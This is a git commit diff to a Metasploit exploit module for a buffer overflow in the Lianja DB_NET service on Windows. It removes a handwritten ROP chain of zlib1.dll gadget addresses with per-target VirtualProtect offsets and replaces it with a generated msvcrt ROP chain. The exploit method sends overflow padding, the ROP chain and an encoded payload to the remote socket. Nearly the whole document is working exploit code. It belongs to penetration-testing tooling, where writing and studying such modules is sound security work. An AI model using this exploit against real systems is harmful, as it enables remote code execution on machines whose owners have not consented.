Use msvcrt in ropdb for stability.

zeroSteiner · zeroSteiner · commit 70e1379338d4 · 2013-05-30T11:13:22.000-04:00
diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -10,6 +10,7 @@
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::RopDb
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -37,11 +38,8 @@ def initialize(info = {})
 				},
 			'Targets'        =>
 				[
-					[ 'Windows Server 2008 SP1', { 'vp_offset' => 0xffff0488 } ],
-					[ 'Windows 7 SP1', { 'vp_offset' => 0xfffe55f1 } ],
-					[ 'Windows Server 2003 SP1', { 'vp_offset' => 0xffff7483 } ],
-					[ 'Windows XP SP3', { 'vp_offset' => 0xfffed507 } ],
-					[ 'Windows XP SP2', { 'vp_offset' => 0xfffc882d } ],
+					[ 'Windows Server 2003 SP1-SP2', { 'rop_target' => '2003' } ],
+					[ 'Windows XP SP3', { 'rop_target' => 'xp' } ],
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => true,
@@ -66,40 +64,6 @@ def check
 		return Exploit::CheckCode::Safe
 	end
 
-	def rop_chain
-		# all addresses are in zlib1.dll
-		rop_chain = [
-			0x61b8f873,				# POP EBP # RETN
-			0x06b930c6,				# 0x06b930c6-> ebp
-			0x61b86430,				# XCHG EAX,EBP # RETN
-			0x61b88f48,				# MOV ESI,DWORD PTR DS:[EAX+5B000016] # RETN
-			0x61b86858,				# POP ECX # ADC AL,39 # RETN
-			target['vp_offset'],	# something-> ecx (offset of &k32.VirtualProtect - &k32.AddAtomA)
-			0x61b84c8d,				# ADD ESI,ECX # POP EBX # MOV EAX,ESI # POP ESI # RETN
-			0x41414141,				# Filler (compensate)
-			0x61B925e0,				# address of zlib1:.edata
-			0x61b8fcab,				# JMP EAX
-			0x61b8493a,				# RETN (ROP NOP)
-			0x61B925e0,				# address of zlib1:.edata
-			0x00000500,				# dwSize
-			0x00000040,				# NewProtect
-			0x61B925d0,				# lpOldProtect
-			0x61b84939,				# POP EDI # RETN
-			0x00000000,				# 0x00000000-> edi
-			0x61b8f873,				# POP EBP # RETN
-			0x61b93146,				# 0x61b93146-> ebp
-			0x61b86430,				# XCHG EAX,EBP # RETN
-			0x61b8c9fc,				# ADC EDI,DWORD PTR DS:[EAX-2] # MOV EBX,DWORD PTR SS:[ESP+8] # ADD ESP,0C # RETN
-			0x41414141,				# Filler (compensate)
-			0x42424242,				# Filler (compensate)
-			0x00000500,				# size
-			0x61b8f873,				# POP EBP # RETN
-			0x61B925e0,				# address of zlib1:.edata
-			0x61b820fd,				# PUSHAD # RETN
-		].pack("V*")
-		return rop_chain
-	end
-
 	def exploit
 		connect
 		sock.put("db_net")
@@ -109,8 +73,7 @@ def exploit
 		evil_data =  '000052E1'
 		evil_data << 'A'
 		evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur
-		evil_data << rop_chain
-		evil_data << payload.encoded
+		evil_data << generate_rop_payload('msvcrt', payload.encoded, {'target' => target['rop_target']})
 		sock.put(evil_data)
 		disconnect
 	end
